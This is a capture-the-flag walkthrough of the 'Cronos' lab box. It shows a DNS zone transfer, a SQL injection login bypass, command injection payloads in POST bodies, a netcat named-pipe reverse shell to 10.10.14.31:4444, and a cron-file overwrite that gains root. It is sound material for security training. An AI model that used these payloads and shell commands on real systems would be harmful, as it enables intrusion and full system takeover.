Summary
Cronos is an easy Linux box that can be exploited by properly enumerating all ports and services. You will find that there are multiple domains by enumerating DNS. The admin login page is vulnerable to SQL Injection after which you can execute command injection to obtain a low level shell. Privileges can be escalated by exploiting a php cronjob.
Discovery
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.28.223
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After navigating to the server, I quickly started enumerating DNS. In this case you have to add the domain cronos.htb to your hosts file. You can now run dig to enumerate subdomains like so:
dig axfr @10.129.28.223 cronos.htb
; DiG 9.16.4-Debian axfr @10.129.28.223 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.129.28.223
admin.cronos.htb. 604800 IN A 10.129.28.223
ns1.cronos.htb. 604800 IN A 10.129.28.223
www.cronos.htb. 604800 IN A 10.129.28.223
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.28.223#53(10.129.28.223)
;; WHEN: Mon Oct 26 20:48:09 CET 2020
;; XFR size: 7 records (messages 1, bytes 203)
Exploitation
The server showed that Laravel Framework was used so I spent quite some time looking into exploits for the laravel framework. However, this was apparantly not the way to go so I kept looking and finally found that the admin login is vulnerable to a SQL Injection. I used BurpSuite to test this and found the following payload:
username=tes'%20OR%201%20--%20-&password=test
URL decoded to:
username=tes' OR 1 -- -&password=test
The server returns a 302 Found to:
HTTP/1.1 302 Found
Date: Mon, 26 Oct 2020 19:56:28 GMT
Server: Apache/2.4.18 (Ubuntu)
location: welcome.php
It was successful to bypass authentication and the user is now presented with a new page.
Command Injection
At this point it is relatively clear that there is a command injection. The ‘ping’ option was intercepted and looked like this:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=ping+-c+1&host=10.10.14.31
After experimenting with this command it was found that you can execute commands by using the following payload:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=ls;ping+-c+1&host=10.10.14.31
With the following request you can get the user.txt from the user noulis:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=cat%20/home/noulis/user.txt;ping+-c+1&host=10.10.14.31
I found it a little bit tricky to get a reverse shell as netcat and php reverse shells from pentestmonkey both didn’t work. I looked up what reverse shell was used and found this one:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f
URL encoded this with Burp and managed to get a reverse shell this way.
Privilege Escalation
I always start by running linpeas. Linpeas flagged the following in red/yellow which means its highly suspicious:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
This file has the following permissions:
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan
This means you, as www-data user, can modify this file and root will run this every minute. It is important to mention that it is a php file. This PHP reverse shell from pentestmonkey was downloaded and named artisan. It was transferred over with wget and a minute later a shell was obtained with the root user!
Conclusion
I found this box a lot of fun. It started off a bit difficult with the DNS stuff but it turned into a really nice and straightforward box. It was often very clear what the exploitation path was so this saved some time. I spent a couple hours on this box and had a lot of fun doing it. Hope you enjoyed my tutorial!